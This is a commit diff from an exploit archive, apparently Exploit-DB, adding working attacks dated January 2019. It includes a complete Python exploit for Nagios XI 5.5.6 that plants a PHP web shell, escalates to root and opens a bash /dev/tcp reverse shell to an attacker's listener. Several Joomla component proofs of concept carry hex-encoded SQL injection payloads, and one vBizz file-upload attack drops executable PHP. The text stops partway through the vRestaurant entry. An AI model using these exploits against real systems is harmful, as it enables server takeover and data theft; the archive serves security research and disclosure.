DB: 2019-01-24

12 changes to exploits/shellcodes Microsoft Windows CONTACT - HTML Injection / Remote Code Execution Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation Joomla! Component vBizz 1.0.7 - SQL Injection Joomla! Component vBizz 1.0.7 - Remote Code Execution Joomla! Component vWishlist 1.0.1 - SQL Injection Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection Joomla! Component vReview 1.9.11 - SQL Injection Joomla! Component vRestaurant 1.9.4 - SQL Injection Joomla! Component VMap 1.9.6 - SQL Injection Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection
2019-01-24 05:01:41 +00:00 · 2019-01-24 05:01:41 +00:00 · 9ef926e1a1
commit 9ef926e1a1
parent 9e738d6dae
13 changed files with 965 additions and 0 deletions
--- a/exploits/linux/webapps/46221.py
+++ b/exploits/linux/webapps/46221.py
@ -0,0 +1,256 @@
+# Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation
+# Date: 2019-01-22
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: https://www.nagios.com/
+# Product: Nagios XI
+# Software Link: https://assets.nagios.com/downloads/nagiosxi/5/xi-5.5.6.tar.gz
+# Version: From 2012r1.0 to 5.5.6
+# Tested on: 
+#	- CentOS Linux 7.5.1804 (Core) / Kernel 3.10.0 / This was a vendor-provided .OVA file
+#	- Nagios XI 2012r1.0, 5r1.0, and 5.5.6
+# CVE: CVE-2018-15708, CVE-2018-15710
+#
+# See Also:
+# https://www.tenable.com/security/research/tra-2018-37
+# https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172
+#
+# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop a root reverse shell.
+# You'll need your own Netcat listener
+
+from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
+import SocketServer, threading, ssl
+import requests, urllib
+import sys, os, argparse
+from OpenSSL import crypto
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+TIMEOUT = 5 # sec
+
+def err_and_exit(msg):
+    print '\n\nERROR: ' + msg + '\n\n'
+    sys.exit(1)
+
+# handle sending a get request
+def http_get_quiet(url):
+    try:
+        r = requests.get(url, timeout=TIMEOUT, verify=False)
+    except requests.exceptions.ReadTimeout:
+        err_and_exit("Request to '" + url + "' timed out.")
+    else:
+        return r
+
+# 200?
+def url_ok(url):
+    r = http_get_quiet(url)
+    return (r.status_code == 200)
+
+# run a shell command using the PHP file we uploaded
+def send_shell_cmd(path, cmd):
+    querystr = { 'cmd' : cmd }
+    # e.g. http://blah/exec.php?cmd=whoami
+    url = path + '?' + urllib.urlencode(querystr)
+    return http_get_quiet(url)
+
+# delete some files locally and on the Nagios XI instance
+def clean_up(remote, paths, exec_path=None):
+    if remote:
+        for path in paths:
+            send_shell_cmd(exec_path, 'rm ' + path)
+            print 'Removing remote file ' + path
+    else:
+        for path in paths:
+            os.remove(path)
+            print 'Removing local file ' + path
+
+# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html
+def generate_self_signed_cert(cert_dir, cert_file, key_file):
+    """Generate a SSL certificate.
+ 
+    If the cert_path and the key_path are present they will be overwritten.
+    """
+    if not os.path.exists(cert_dir):
+        os.makedirs(cert_dir)
+    cert_path = os.path.join(cert_dir, cert_file)
+    key_path = os.path.join(cert_dir, key_file)
+ 
+    if os.path.exists(cert_path):
+        os.unlink(cert_path)
+    if os.path.exists(key_path):
+        os.unlink(key_path)
+ 
+    # create a key pair
+    key = crypto.PKey()
+    key.generate_key(crypto.TYPE_RSA, 1024)
+ 
+    # create a self-signed cert
+    cert = crypto.X509()
+    cert.get_subject().C = 'US'
+    cert.get_subject().ST = 'Lorem'
+    cert.get_subject().L = 'Ipsum'
+    cert.get_subject().O = 'Lorem'
+    cert.get_subject().OU = 'Ipsum'
+    cert.get_subject().CN = 'Unknown'
+    cert.set_serial_number(1000)
+    cert.gmtime_adj_notBefore(0)
+    cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60) 
+    cert.set_issuer(cert.get_subject())
+    cert.set_pubkey(key)
+    cert.sign(key, 'sha1')
+ 
+    with open(cert_path, 'wt') as fd: 
+        fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
+ 
+    with open(key_path, 'wt') as fd: 
+        fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
+ 
+    return cert_path, key_path
+
+# HTTP request handler
+class MyHTTPD(BaseHTTPRequestHandler):
+    def do_GET(self):
+        self.send_response(200)
+        msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file
+        self.end_headers()
+        self.wfile.write(str.encode(msg))
+
+# Make the http listener operate on its own thread
+class ThreadedWebHandler(object):
+    def __init__(self, host, port, keyfile, certfile):
+        self.server = SocketServer.TCPServer((host, port), MyHTTPD)
+	self.server.socket = ssl.wrap_socket(
+	    self.server.socket,
+	    keyfile=keyfile,
+	    certfile=certfile,
+	    server_side=True
+	)
+        self.server_thread = threading.Thread(target=self.server.serve_forever)
+        self.server_thread.daemon = True
+
+    def start(self):
+        self.server_thread.start()
+
+    def stop(self):
+        self.server.shutdown()
+        self.server.server_close()
+
+##### MAIN #####
+
+desc = 'Nagios XI 2012r1.0 < 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation'
+arg_parser = argparse.ArgumentParser(description=desc)
+arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)')
+arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
+arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
+arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
+arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
+
+args = arg_parser.parse_args()
+
+# Nagios XI target settings
+target = { 'ip' : args.t }
+
+# listener settings
+listener = {
+    'ip'    : args.ip,
+    'port'  : args.port,
+    'ncip'  : args.ncip,
+    'ncport': args.ncport
+}
+
+# generate self-signed cert
+cert_file = 'cert.crt'
+key_file = 'key.key'
+generate_self_signed_cert('./', cert_file, key_file)
+
+# start threaded listener
+# thanks http://brahmlower.io/threaded-http-server.html
+server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file)
+server.start()
+
+print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
+
+# path to Nagios XI app
+base_url = 'https://' + target['ip']
+
+# ensure magpie_debug.php exists
+magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
+if not url_ok(magpie_url):
+    err_and_exit('magpie_debug.php not found.')
+
+print '\nFound magpie_debug.php.\n'
+
+exec_path = None        # path to exec.php in URL
+cleanup_paths = []     # local path on Nagios XI filesystem to clean up
+# ( local fs path : url path )
+paths = [
+    ( '/usr/local/nagvis/share/', '/nagvis' ),
+    ( '/var/www/html/nagiosql/', '/nagiosql' )
+]
+
+# inject argument to create exec.php
+# try multiple directories if necessary. dir will be different based on nagios xi version
+filename = 'exec.php'
+for path in paths:
+    local_path = path[0] + filename # on fs
+    url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path  # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php
+    url = magpie_url + '?url=' + url
+    print 'magpie url = ' + url
+    r = http_get_quiet(url)
+
+    # ensure php file was created
+    exec_url = base_url + path[1] + '/' + filename  # e.g. https://192.168.1.192/nagiosql/exec.php
+    if url_ok(exec_url):
+        exec_path = exec_url
+        cleanup_paths.append(local_path)
+        break
+    # otherwise, try the next path
+
+if exec_path is None:
+    err_and_exit('Couldn\'t create PHP file.')
+
+print '\n' + filename + ' written. Visit ' + exec_url + '\n'
+
+# run a few commands to display status to user
+print 'Gathering some basic info...'
+cmds = [
+    ('whoami', 'Current User'),
+    ("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version')
+]
+
+for cmd in cmds:
+    r = send_shell_cmd(exec_url, cmd[0])
+    sys.stdout.write('\t' + cmd[1] + ' => ' + r.text)
+
+# candidates for privilege escalation
+# depends on Nagios XI version
+rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1'
+# tuple contains (shell command, cleanup path)
+priv_esc_list = [
+    ("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'),
+    ("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None)
+]
+
+# escalate privileges and launch the connect-back shell
+timed_out = False
+for priv_esc in priv_esc_list:
+    try:
+        querystr = { 'cmd' : priv_esc[0] }
+        url = exec_path + '?' + urllib.urlencode(querystr)
+        r = requests.get(url, timeout=TIMEOUT, verify=False)
+        print '\nTrying to escalate privs with url: ' + url
+    except requests.exceptions.ReadTimeout:
+        timed_out = True
+        if priv_esc[1] is not None:
+            cleanup_paths.append(priv_esc[1])
+        break
+
+if timed_out:
+    print 'Check for a shell!!\n'
+else:
+    print 'Not so sure it worked...\n'
+
+server.stop()
+
+# clean up files we created
+clean_up(True, cleanup_paths, exec_path) # remote files
+clean_up(False, [cert_file, key_file])
--- a/exploits/php/webapps/46223.txt
+++ b/exploits/php/webapps/46223.txt
@ -0,0 +1,45 @@
+# Exploit Title: Joomla! Component vBizz 1.0.7 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://wdmtech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
+# Version: 1.0.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php
+# 
+
+POST /[PATH]/index.php? HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 726
+Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310; joomla_user_state=logged_in
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+profile_pic=&name=test&username=test&password=&user_role=11&email=test@test.test&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7&amount[]=0.00&payid[]=8&amount[]=0.00&payid[]=9%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&lastIncrement=7&option=com_vbizz&id=60&userid=60&task=apply&view=employee: undefined
+HTTP/1.1 500 Internal Server Error
+X-Powered-By: PHP/5.6.36
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: text/html; charset=UTF-8
+Server: - Web acceleration by http://target/
+X-Cacheable: NO: beresp.status
+X-Cacheable-status: 500
+Content-Length: 4278
+Accept-Ranges: bytes
+Date: Tue, 22 Jan 2019 21:10:53 GMT
+X-Varnish: 561075451
+Age: 0
+Via: 1.1 varnish
+Connection: keep-alive
+X-Cache: MISS
--- a/exploits/php/webapps/46224.txt
+++ b/exploits/php/webapps/46224.txt
@ -0,0 +1,177 @@
+# Exploit Title: Joomla! Component vBizz 1.0.7 - Remote Code Execution
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://wdmtech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/
+# Version: 1.0.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_vbizz&view=employee
+# 
+
+POST /[PATH]/index.php?option=com_vbizz&view=employee HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/octet-stream
+Content-Length: 3876
+Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
+Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------21301381330395: undefined
+Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
+<?php
+phpinfo();
+?>
+-----------------------------21301381330395
+Content-Disposition: form-data; name="name"
+test
+-----------------------------21301381330395
+Content-Disposition: form-data; name="username"
+test
+-----------------------------21301381330395
+Content-Disposition: form-data; name="password"
+-----------------------------21301381330395
+Content-Disposition: form-data; name="user_role"
+11
+-----------------------------21301381330395
+Content-Disposition: form-data; name="email"
+test@test.test
+-----------------------------21301381330395
+Content-Disposition: form-data; name="empid"
+1
+-----------------------------21301381330395
+Content-Disposition: form-data; name="department"
+5
+-----------------------------21301381330395
+Content-Disposition: form-data; name="designation"
+6
+-----------------------------21301381330395
+Content-Disposition: form-data; name="phone"
+-----------------------------21301381330395
+Content-Disposition: form-data; name="gender"
+1
+-----------------------------21301381330395
+Content-Disposition: form-data; name="blood_group"
+A+
+-----------------------------21301381330395
+Content-Disposition: form-data; name="dob"
+-1-11-30
+-----------------------------21301381330395
+Content-Disposition: form-data; name="present_address"
+-----------------------------21301381330395
+Content-Disposition: form-data; name="permanent_address"
+-----------------------------21301381330395
+Content-Disposition: form-data; name="joining_date"
+-1-11-30
+-----------------------------21301381330395
+Content-Disposition: form-data; name="work_type"
+permanent
+-----------------------------21301381330395
+Content-Disposition: form-data; name="payment_type"
+bank
+-----------------------------21301381330395
+Content-Disposition: form-data; name="pan"
+-----------------------------21301381330395
+Content-Disposition: form-data; name="pf_ac"
+0
+-----------------------------21301381330395
+Content-Disposition: form-data; name="bank_ac"
+0
+-----------------------------21301381330395
+Content-Disposition: form-data; name="bank_name"
+-----------------------------21301381330395
+Content-Disposition: form-data; name="bank_branch"
+-----------------------------21301381330395
+Content-Disposition: form-data; name="ifsc"
+-----------------------------21301381330395
+Content-Disposition: form-data; name="leaving_date"
+-1-11-30
+-----------------------------21301381330395
+Content-Disposition: form-data; name="amount[]"
+111.00
+-----------------------------21301381330395
+Content-Disposition: form-data; name="payid[]"
+7
+-----------------------------21301381330395
+Content-Disposition: form-data; name="amount[]"
+0.00
+-----------------------------21301381330395
+Content-Disposition: form-data; name="payid[]"
+8
+-----------------------------21301381330395
+Content-Disposition: form-data; name="amount[]"
+0.00
+-----------------------------21301381330395
+Content-Disposition: form-data; name="payid[]"
+9
+-----------------------------21301381330395
+Content-Disposition: form-data; name="lastIncrement"
+7
+-----------------------------21301381330395
+Content-Disposition: form-data; name="option"
+com_vbizz
+-----------------------------21301381330395
+Content-Disposition: form-data; name="id"
+60
+-----------------------------21301381330395
+Content-Disposition: form-data; name="userid"
+60
+-----------------------------21301381330395
+Content-Disposition: form-data; name="task"
+
+apply
+-----------------------------21301381330395
+Content-Disposition: form-data; name="view"
+employee
+-----------------------------21301381330395--
+HTTP/1.1 303 See other
+X-Powered-By: PHP/5.6.36
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: /index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
+Last-Modified: Tue, 22 Jan 2019 21:21:40 GMT
+Content-Type: text/html; charset=utf-8
+Server: - Web acceleration by http://target/
+X-Cacheable: YES
+Content-Length: 28854
+Accept-Ranges: bytes
+Date: Tue, 22 Jan 2019 21:21:40 GMT
+X-Varnish: 561081442
+Via: 1.1 varnish
+Connection: keep-alive
+age: 0
+X-Cache: MISS
+
+GET /components/com_vbizz/uploads/profile_pics/1548192100phpinfo.php HTTP/1.1
+Host: vbizz-for-joomla.wdmtech.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
+Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in
+DNT: 1
+Connection: keep-alive
+HTTP/1.1 200 OK
+X-Powered-By: PHP/5.6.36
+Content-Type: text/html; charset=UTF-8
+Server: - Web acceleration by http://target/
+X-Cacheable: YES
+Content-Length: 110286
+Accept-Ranges: bytes
+Date: Tue, 22 Jan 2019 21:21:44 GMT
+X-Varnish: 561081464
+Via: 1.1 varnish
+Connection: keep-alive
+age: 0
+X-Cache: MISS
--- a/exploits/php/webapps/46225.txt
+++ b/exploits/php/webapps/46225.txt
@ -0,0 +1,72 @@
+# Exploit Title: Joomla! Component vWishlist 1.0.1 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://wdmtech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/vwishlist/
+# Version: 1.0.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]//
+# 
+
+POST /[PATH]/ HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 372
+Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58: undefined
+HTTP/1.1 500 XPATH syntax error:...
+Date: Tue, 22 Jan 2019 21:54:01 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.16
+X-Logged-In: True
+P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
+Cache-Control: no-cache
+Pragma: no-cache
+Vary: Accept-Encoding
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+
+# POC: 
+# 2)
+# http://localhost/[PATH]//
+# 
+
+POST /[PATH]/ HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 372
+Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+option=com_vwishlist&task=wishlist&wishval=1&userid=711%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48: undefined
+HTTP/1.1 500 XPATH syntax error:...
+Date: Tue, 22 Jan 2019 21:53:42 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.16
+X-Logged-In: True
+P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
+Cache-Control: no-cache
+Pragma: no-cache
+Vary: Accept-Encoding
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
--- a/exploits/php/webapps/46226.txt
+++ b/exploits/php/webapps/46226.txt
@ -0,0 +1,42 @@
+# Exploit Title: Joomla! Component vAccount 2.0.2 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://wdmtech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/financial/cost-calculators/vaccount/
+# Version: 2.0.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/vaccount-dashboard/expense?vid=[SQL]
+# 
+
+GET /[PATH]/vaccount-dashboard/expense?vid=18%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29,%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: 39b5054fae6740372b1521628707bdc7=pusmhir0h1896vr6v5dvmnqd46
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 500 Internal Server Error
+X-Powered-By: PHP/5.6.36
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: text/html; charset=UTF-8
+Server: - Web acceleration by http://target/
+X-Cacheable: NO: beresp.status
+X-Cacheable-status: 500
+Content-Length: 4216
+Accept-Ranges: bytes
+Date: Tue, 22 Jan 2019 21:33:56 GMT
+X-Varnish: 561086750
+Age: 0
+Via: 1.1 varnish
+Connection: keep-alive
+X-Cache: MISS
--- a/exploits/php/webapps/46227.txt
+++ b/exploits/php/webapps/46227.txt
@ -0,0 +1,70 @@
+# Exploit Title: Joomla! Component vReview 1.9.11 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://wdmtech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/ratings-a-reviews/vreview/
+# Version: 1.9.11
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_vreview&task=editReview
+# 
+
+POST /[PATH]/index.php?option=com_vreview&task=editReview HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 210
+Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+cmId=%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d: undefined
+HTTP/1.1 200 OK
+Date: Tue, 22 Jan 2019 19:41:46 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.16
+Vary: Accept-Encoding
+Keep-Alive: timeout=5, max=98
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_vreview&task=displayRecords
+# 
+
+POST /[PATH]/index.php?option=com_vreview&task=displayReply HTTP/1.1
+POST /[PATH]/index.php?option=com_vreview&task=displayRecords HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 424
+Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+profileid=%39%39%39%39%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2d%2d%20%2d: undefined
+HTTP/1.1 500....
+Date: Tue, 22 Jan 2019 19:33:39 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.16
+X-Logged-In: False
+P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
+Cache-Control: no-cache
+Pragma: no-cache
+Vary: Accept-Encoding
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
--- a/exploits/php/webapps/46228.txt
+++ b/exploits/php/webapps/46228.txt
@ -0,0 +1,47 @@
+# Exploit Title: Joomla! Component vRestaurant 1.9.4 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://wdmtech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/vrestaurant/
+# Version: 1.9.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/menu-listing-layout/menuitems
+# 
+
+%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%4e%52%3a%3d%30%29%2c%28%53%45%4c%45%43%54%28%30%29%46%52%4f%4d%28%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%29%57%48%45%52%45%28%54%41%42%4c%45%5f%53%43%48%45%4d%41%21%3d%30%78%36%39%36%65%36%36%36%66%37%32%36%64%36%31%37%34%36%39%36%66%36%65%35%66%37%33%36%33%36%38%36%35%36%64%36%31%29%41%4e%44%28%30%78%30%30%29%49%4e%28%40%78%3a%3d%43%4f%4e%43%41%54%28%40%78%2c%4c%50%41%44%28%40%4e%52%3a%3d%40%4e%52%25%32%62%31%2c%34%2c%30%78%33%30%29%2c%30%78%33%61%32%30%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2d%2d%20%2d
+
+# keysearch=[SQL]
+# categories[]=[SQL]
+# min=[SQL]
+# max=[SQL]
+
+POST /[PATH]/menu-listing-layout/menuitems HTTP/1.1
+Host: TARGET
